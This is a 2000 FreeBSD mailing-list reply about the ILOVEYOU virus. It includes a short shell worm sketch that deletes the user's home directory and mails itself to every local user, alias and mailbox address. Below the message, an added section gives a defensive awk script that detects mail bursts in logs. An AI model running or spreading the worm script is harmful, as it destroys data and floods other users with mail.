From owner-freebsd-hackers Fri May 5 3:42:58 2000
Delivered-To: freebsd-hackers@freebsd.org
Received: from pandora.alice.net.uk (pandora.alice.net.uk [212.42.0.35])
	by hub.freebsd.org (Postfix) with ESMTP id C4A1837B6BA
	for ; Fri, 5 May 2000 03:42:53 -0700 (PDT)
	(envelope-from aledm@routers.co.uk)
Received: from localhost (localhost [127.0.0.1])
	by pandora.alice.net.uk (8.9.3/8.9.3) with ESMTP id LAA73946;
	Fri, 5 May 2000 11:36:51 +0100 (BST)
	(envelope-from aledm@routers.co.uk)
Date: Fri, 5 May 2000 11:36:51 +0100 (BST)
From: Aled Morris
X-Sender: aledm@pandora.alice.net.uk
To: Jeremiah Gowdy
Cc: Taavi Talvik , Matthew Dillon , Lloyd Rennie , hackers@FreeBSD.ORG
Subject: Re: ILOVEYOU
In-Reply-To: <002b01bfb5f7$568d17a0$5a5d0418@vista1.sdca.home.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-hackers@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.ORG

On Thu, 4 May 2000, Jeremiah Gowdy wrote:

>lol. The only way you could really have a virus in freebsd is if it was
>launched or infected as root. Otherwise the virus would be VERY limited.

I don't agree that it would be limited. The reason for the "success"
of ILOVEYOU is that its replication is simple. On a typical PC
nowadays (500MHz I guess) and with an easily accessed "global address
list" (company wide shared address book) you can send out a lot of
messages.

My point is that the act of sending out the messages is the worst part
of this "virus". From a DoS point of view, that's all you need to do.

On a Unix system a similar script could send out messages too, but
without a shared GAL there aren't as many targets:

#!/bin/sh
# this script is called "/tmp/mytext"

# first do damage (in background, this is Unix after all)
rm -rf $HOME &

# now replicate - perhaps we should have three subprocesses here?
for i in `awk -F: '{print $1}' /etc/passwd`; do
	mail -s ILOVEYOU $i < /tmp/mytext
done

# could have used awk...
for i in `grep '^[.a-zA-Z0-9-]*:' /etc/aliases | sed 's/:.*//'`; do
	mail -s ILOVEYOU $i < /tmp/mytext
done

for i in `sed -n 's/^.*[ ,]\([.a-zA-Z0-9-]*@[.a-zA-Z0-9-]*\).*$/\1/p' /var/mail/$USER`; do
	mail -s ILOVEYOU $i < /tmp/mytext
done

Of course the hard job would be to get someone to execute something
containing this script. Perhaps embedded in a "shar" file? (does
anyone still use shar?)

Aled
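
Added example, not part of the original message: the harm described above is the burst of outgoing mail from one account, and that burst is visible in the mail log. This script counts locally submitted messages per sender per minute; the sendmail-style log layout, the sample lines and the account names are constructed assumptions.

```sh
#!/bin/sh
# Added example (not from the original message): flag local accounts that
# submit a burst of mail within one minute. Input: sendmail-style "from="
# log lines on stdin. The log layout and account names are assumptions.

# flag_fanout LIMIT: print "sender Mon D HH:MM" once per sender and minute
# when that sender reaches LIMIT locally submitted messages in that minute.
flag_fanout() {
    awk -v limit="$1" '
        # Local submissions only: logged here with relay=user@localhost
        / from=/ && /relay=[^ ,]*@localhost/ {
            sender = $0
            sub(/.* from=/, "", sender)   # drop everything up to the sender
            sub(/,.*/, "", sender)        # drop the remaining fields
            minute = $1 " " $2 " " substr($3, 1, 5)
            if (++count[sender SUBSEP minute] == limit)
                print sender, minute
        }'
}

# Constructed sample log: alice submits five messages in one minute, bob two;
# one message comes from a remote relay and one line is a delivery record.
sample_log() {
    cat <<'EOF'
May  5 11:36:51 mailhost sendmail[101]: LAA00101: from=alice, size=612, class=0, nrcpts=1, relay=alice@localhost
May  5 11:36:51 mailhost sendmail[102]: LAA00101: to=bob, ctladdr=alice (1001/1001), delay=00:00:00, mailer=local, stat=Sent
May  5 11:36:51 mailhost sendmail[103]: LAA00103: from=alice, size=612, class=0, nrcpts=1, relay=alice@localhost
May  5 11:36:52 mailhost sendmail[105]: LAA00105: from=alice, size=612, class=0, nrcpts=1, relay=alice@localhost
May  5 11:36:52 mailhost sendmail[107]: LAA00107: from=bob, size=840, class=0, nrcpts=1, relay=bob@localhost
May  5 11:36:52 mailhost sendmail[110]: LAA00110: from=<carol@example.org>, size=900, class=0, nrcpts=1, relay=mx.example.org [192.0.2.10]
May  5 11:36:53 mailhost sendmail[111]: LAA00111: from=alice, size=612, class=0, nrcpts=1, relay=alice@localhost
May  5 11:36:53 mailhost sendmail[113]: LAA00113: from=alice, size=612, class=0, nrcpts=1, relay=alice@localhost
May  5 11:36:54 mailhost sendmail[115]: LAA00115: from=bob, size=310, class=0, nrcpts=1, relay=bob@localhost
EOF
}

# Report senders with four or more local submissions in a single minute.
sample_log | flag_fanout 4
```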